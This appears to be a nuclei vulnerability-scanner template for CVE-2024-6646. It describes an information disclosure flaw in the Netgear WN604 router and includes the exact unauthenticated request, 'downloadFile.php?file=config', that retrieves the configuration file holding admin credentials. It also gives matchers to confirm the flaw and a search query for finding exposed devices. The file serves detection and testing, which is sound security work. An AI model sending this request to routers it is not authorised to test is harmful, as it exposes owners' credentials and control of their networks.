nuclei-templates/http/cves/2024/CVE-2024-6646.yaml

48 lines
1.6 KiB
YAML
Raw Normal View History

2024-07-17 14:14:36 +00:00
id: CVE-2024-6646
info:
name: Netgear-WN604 downloadFile.php - Information Disclosure
author: pussycat0x
severity: medium
description: |
There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.
reference:
- https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
- https://github.com/mikutool/vul/issues/1
- https://vuldb.com/?ctiid.271052
- https://vuldb.com/?id.271052
- https://vuldb.com/?submit.367382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-6646
cwe-id: CWE-200
epss-score: 0.00045
epss-percentile: 0.16001
metadata:
fofa-query: title=="Netgear"
tags: cve,cve2024,netgear
http:
- method: GET
path:
- "{{BaseURL}}/downloadFile.php?file=config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "system:basicSettings"
- "system:staSettings"
2024-07-17 14:17:24 +00:00
condition: and
2024-07-17 14:14:36 +00:00
2024-07-18 06:02:02 +00:00
- type: word
part: content_type
words:
- "application/force-download"
2024-07-17 14:14:36 +00:00
- type: status
status:
- 200